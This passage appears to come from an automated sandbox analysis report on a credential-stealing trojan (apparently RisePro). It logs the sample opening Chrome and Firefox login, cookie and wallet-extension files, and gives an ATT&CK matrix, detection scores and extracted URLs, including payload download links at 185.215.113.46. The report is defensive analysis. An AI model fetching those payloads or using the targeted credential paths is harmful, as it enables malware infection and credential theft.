                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENTJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\cookies.sqliteJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENTJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENTJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\formhistory.sqliteJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\signons.sqliteJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\logins.jsonJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\signons.sqliteJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\places.sqlite
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                          Source: Yara match File source: 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 1096, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 5324, type: MEMORYSTR

                          Remote Access Functionality

                          Source: Yara match File source: 6.3.MPGPH131.exe.1461520.9.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000006.00000003.2506172514.0000000001446000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 1096, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 3632, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 7216, type: MEMORYSTR
                          Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tYPDz_TYm0NTu0Y5ud8z_nO.zip, type: DROPPED
                          Source: Yara match File source: C:\Users\user\AppData\Local\Temp\up45CFBz_Ai1CiBRyRFsyfp.zip, type: DROPPED
                          Source: Yara match File source: C:\Users\user\AppData\Local\Temp\4enxhe06Yd_3ns7WRVTEXcO.zip, type: DROPPED
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 11 Scheduled Task/Job | 12 Process Injection | 11 Masquerading | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Email Collection | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 11 Scheduled Task/Job | 121 Registry Run Keys / Startup Folder | 11 Scheduled Task/Job | 25 Virtualization/Sandbox Evasion | LSASS Memory | 1 Query Registry | Remote Desktop Protocol | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 121 Registry Run Keys / Startup Folder | 12 Process Injection | Security Account Manager | 741 Security Software Discovery | SMB/Windows Admin Shares | 2 Data from Local System | Steganography | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | NTDS | 25 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Extra Window Memory Injection | 3 Obfuscated Files or Information | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Software Packing | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 3 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Extra Window Memory Injection | Proc Filesystem | 226 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                          [Behavior graph] Behavior Graph ID: 1396093, Sample: I2jCDr35mu.exe, Startdate: 21/02/2024, Architecture: WINDOWS, Score: 100

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| I2jCDr35mu.exe | 39% | ReversingLabs | Win32.Trojan.Generic | |
| I2jCDr35mu.exe | 42% | Virustotal | | Browse |
| I2jCDr35mu.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| C:\Users\user\AppData\Local\AdobeUpdaterV131\AdobeUpdaterV131.exe | 100% | Avira | TR/Crypt.TPM.Gen | |
| C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe | 100% | Avira | TR/Crypt.TPM.Gen | |
| C:\Users\user\AppData\Local\AdobeUpdaterV131\AdobeUpdaterV131.exe | 100% | Joe Sandbox ML | | |
| C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe | 100% | Joe Sandbox ML | | |
| C:\ProgramData\MPGPH131\MPGPH131.exe | 100% | Joe Sandbox ML | | |
| C:\ProgramData\MPGPH131\MPGPH131.exe | 39% | ReversingLabs | Win32.Trojan.Generic | |
| C:\Users\user\AppData\Local\RageMP131\RageMP131.exe | 39% | ReversingLabs | Win32.Trojan.Generic | |
| C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll (copy) | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll.tmp | 0% | ReversingLabs | | |
                          No Antivirus matches
                          No Antivirus matches
                          No contacted domains info
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://www.ecosia.org/newtab/I2jCDr35mu.exe, 00000000.00000003.2210951115.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2216828658.0000000005CCE000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2213460519.0000000005CAD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2284201731.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2278032895.00000000062D3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2289127154.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2214280425.0000000006328000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2224049430.0000000006338000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2217504481.0000000006338000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.youtube.com/firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3162934326.000001545508B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3226617905.0000015461F4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2946754613.0000290E28A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3279722819.000001545C4B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3101971080.000001546273D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3108638355.0000015461F40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3272678888.000001545508B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3256356812.0000015455286000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://bugzilla.mozilla.org/show_bug.cgi?id=1283601firefox.exe, 00000024.00000003.3222585052.000001546347D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://MD8.mozilla.org/1/mfirefox.exe, 00000024.00000003.2682620775.00000154620EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=firefox.exe, 00000024.00000003.2556167176.000001545FDE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2730426626.0000015450EF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://127.0.0.1:firefox.exe, 00000024.00000003.2549223064.00000154625FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://bugzilla.mozilla.org/show_bug.cgi?id=1266220firefox.exe, 00000024.00000003.3241920189.00000154634B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3102477176.0000015461F47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3223466540.000001546313E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3108485132.00000154627FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152firefox.exe, 00000024.00000003.2829883257.00000154624C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2963701016.00000154624C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3308363713.00000154624C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://ipinfo.io/RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.000000000107B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://shavar.services.mozilla.com/firefox.exe, 00000024.00000003.2680049158.0000015462239000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://185.215.113.46/cost/ladas.exenBuilRageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • 13%, Virustotal, Browse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://accounts.google.comC:firefox.exe, 00000021.00000002.2399450082.000001C4DB630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://ipinfo.io:443/widget/demo/191.96.227.222I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2506172514.000000000140A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.000000000140A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.000000000107B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://spocs.getpocket.com/firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2700569964.000001545E4CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://185.215.113.46/cost/well.exeMPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3265617716.000000000641C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • 22%, Virustotal, Browse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    http://185.215.113.46/cost/ladas.exeFMPGPH131.exe, 00000006.00000002.3345445002.0000000001446000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • 12%, Virustotal, Browse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://t.me/risepro_botGI2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2211769258.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2258451496.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2259213906.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000F66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://t.xMPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://185.215.113.46/mine/amert.exegI2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • 12%, Virustotal, Browse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      http://a9.com/-/spec/opensearch/1.0/firefox.exe, 00000024.00000003.2553660970.0000015462271000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://185.215.113.46/cost/ladas.exe6I2jCDr35mu.exe, 00000000.00000003.2630425787.0000000005D00000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2809320128.0000000005CD8000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3265617716.000000000641C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • 13%, Virustotal, Browse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        https://www.youtube.comC:firefox.exe, 0000001F.00000002.2388590768.00000159B5200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://185.215.113.46/cost/ladas.exeo4HMPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        http://185.215.113.46/mine/amert.exeSI2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2211769258.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2258451496.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2601693895.0000000005CD5000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2259213906.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2809320128.0000000005CD8000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000F66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • 13%, Virustotal, Browse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        http://185.215.113.46/cost/ladas.exe2MPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • 12%, Virustotal, Browse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        http://185.215.113.46/cost/ladas.exe1MPGPH131.exe, 00000006.00000002.3345445002.00000000013FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • 12%, Virustotal, Browse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        http://185.215.113.46/cost/ladas.exe0MPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • 13%, Virustotal, Browse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        http://mozilla.org/MPL/2.0/.firefox.exe, 00000024.00000003.3065217085.0000015453A7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2469545196.0000015453AB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2469545196.0000015453AA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2829883257.00000154624C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3043257931.0000015454ECE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3343901655.0000015453A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2681200219.000001545C450000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2462909736.0000015453D96000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3061707200.000001545E3D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3065069570.0000015453AA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3327988001.0000015453D9A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2972373655.0000015453DB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C18A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3238352322.000001546319A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2502897099.000001545E3D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2703972523.000001545DBC4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2468329463.00000154535C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2568116959.000001545E3D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 
00000024.00000003.3224963305.0000015463497000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3333878095.000001545C44F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3070437706.0000015453AD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://mozilla.org/0cfirefox.exe, 00000024.00000003.2949175906.000012AB64003000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://185.215.113.46/mine/amert.exe?I2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            http://185.215.113.46/cost/ladas.exegI2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • 12%, Virustotal, Browse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839firefox.exe, 00000024.00000003.3119695544.0000015463114000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://x1.c.lencr.org/0firefox.exe, 00000024.00000003.2553660970.00000154622DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2677483972.00000154622DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://x1.i.lencr.org/0firefox.exe, 00000024.00000003.2553660970.00000154622DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2677483972.00000154622DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://t.me/risepro_bot$RageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://185.215.113.46/cost/ladas.exebMPGPH131.exe, 00000006.00000002.3345445002.0000000001446000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • 16%, Virustotal, Browse
                                                                                                • Avira URL Cloud: malware
                                                                                                unknown
                                                                                                http://a9.com/-/spec/opensearch/1.1/firefox.exe, 00000024.00000003.2553660970.0000015462271000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://infra.spec.whatwg.org/#ascii-whitespacefirefox.exe, 00000024.00000003.2539757750.000001545C195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3296549878.000001545C18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C191000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://json-schema.org/draft/2019-09/schemafirefox.exe, 00000024.00000003.2683298473.0000015462047000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://t.me/risepro_bot;RageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
